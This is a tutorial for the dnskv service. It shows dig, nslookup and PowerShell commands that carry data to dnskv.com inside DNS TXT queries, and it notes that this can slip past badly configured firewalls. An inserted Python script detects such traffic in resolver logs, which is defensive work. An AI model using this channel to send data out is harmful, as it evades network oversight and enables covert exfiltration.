
Leaking / transferring data over DNS simplified tutorial - dnskv

In many discussions, it quickly became clear that many people aren't familiar with DNS and that a more comprehensive usage tutorial is required.

The simplest case of all is the echo service: use dig, nslookup or PowerShell to make a TXT record DNS query.

Examples

Using dig (Linux, Mac):

dig txt +short the-secret-message.echo.dnskv.com

Using nslookup via cmd (Old school cmd, Windows):

nslookup -q=txt the-secret-message.echo.dnskv.com

Using PowerShell (The modern way, Windows):

Resolve-DnsName -Type txt -Name the-secret-message.echo.dnskv.com | Where-Object {$_.QueryType -eq '16'} | select Strings

Storing value

Use the samples above, but replace the word echo with your-secret-key. The value will then be stored on the server for a week under that key. The storage is shared, and you can't overwrite existing values, so use a key which isn't yet in use. Do not copy and paste the default values directly unless you're using the echo service, which doesn't store anything in the database.

Retrieving value using key

Remove the the-secret-message part from the queries above and replace echo with the secret key you used when storing the value. The query name should then look like:
your-secret-key.dnskv.com
To give you a sample response, we've already set the key hello for you. Try it out by making a TXT query to the address:
hello.dnskv.com

Using mobile clients

On an Android device, all of the use cases above work with Network Analyzer, which lets you select a DNS TXT query directly. Then just enter the addresses as above, with modifications if desired. Address to use:

the-secret-message.echo.dnskv.com

On iPhone, use Deep Dig. When querying, add txt after the host name. Example:

the-secret-message.echo.dnskv.com txt

Limitations

The address segments can be up to 63 characters long, and only letters, numbers and the dash (but not as the first character) are allowed. These limitations come from the DNS system. The key and value aren't case sensitive. Do not use base64, it won't work. Use base36 instead.

FYI

Setting the value can be done using any device or program which is able to make a DNS query. In some cases this is prevented by the network administration, but in most cases it isn't. Even if the program says it's unable to connect, the query and the related data (key, value) were probably sent when it made the query. This can be used to bypass firewalls and network restrictions in cases where those aren't properly configured.
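Seen from the network administration side, the store queries described above are TXT lookups whose left-most label carries the value, so they are visible in resolver logs. The following Python code is an added example, not part of dnskv or of the original tutorial; the log line format, the thresholds and the sample lines (including the key k9f2x7 and the encoded-looking labels) are constructed assumptions.

```python
import math
from collections import defaultdict

# Constructed resolver log lines: "<client> <qtype> <qname>" (format is an assumption).
SAMPLE_LOG = """\
10.0.0.5 A www.example.org
10.0.0.5 TXT the-secret-message.echo.dnskv.com
10.0.0.7 TXT 3w5e11264sgsg0kz2x9q8vht1m7c4b6n.k9f2x7.dnskv.com
10.0.0.7 TXT 1b8zq0c5y7n2m4x6v9a3s1d7f0g2h5j8.k9f2x7.dnskv.com
10.0.0.7 TXT 7q2w9e4r6t1y8u3i5o0p2a4s6d8f1g3h.k9f2x7.dnskv.com
10.0.0.9 TXT _dmarc.example.org
"""

def entropy(label):
    """Shannon entropy in bits per character; encoded data scores higher than words."""
    total = len(label)
    return -sum(label.count(c) / total * math.log2(label.count(c) / total)
                for c in set(label))

def parse(log):
    """Yield (client, qtype, qname); names are lower-cased because DNS ignores case."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1].upper(), parts[2].lower().rstrip(".")

def flag_txt_carriers(log, min_names=3, min_len=20, min_entropy=3.5):
    """Return {(client, zone): [qnames]} where one client sent several TXT
    queries whose left-most label is long and random-looking."""
    hits = defaultdict(set)
    for client, qtype, qname in parse(log):
        labels = qname.split(".")
        if qtype != "TXT" or len(labels) < 3:
            continue
        zone = ".".join(labels[-2:])  # naive zone guess: last two labels
        value = labels[0]             # the value sits in the left-most label
        if len(value) >= min_len and entropy(value) >= min_entropy:
            hits[(client, zone)].add(qname)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_names}

if __name__ == "__main__":
    for (client, zone), names in flag_txt_carriers(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {len(names)} suspicious TXT lookups")
```

Short, readable values such as the echo example stay below the length threshold, so in practice this check is combined with per-zone query volume.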

The key space is shared between all users. Do not use keys which are easy to guess or which are likely to overlap with other users' keys. The key-value pairs will automatically expire in a week.

Do not first query the value to see if the key is reserved and then try to set it and query again. The information is efficiently cached, which means that you'll get the old response from the cache. Always set the key-value pair first, and only after setting it to the desired value, query it to check the result.

There are a few more advanced options, but those are out of the scope of this simple tutorial. See the dnskv.com project page for more details.

Last update - 2023-01-23
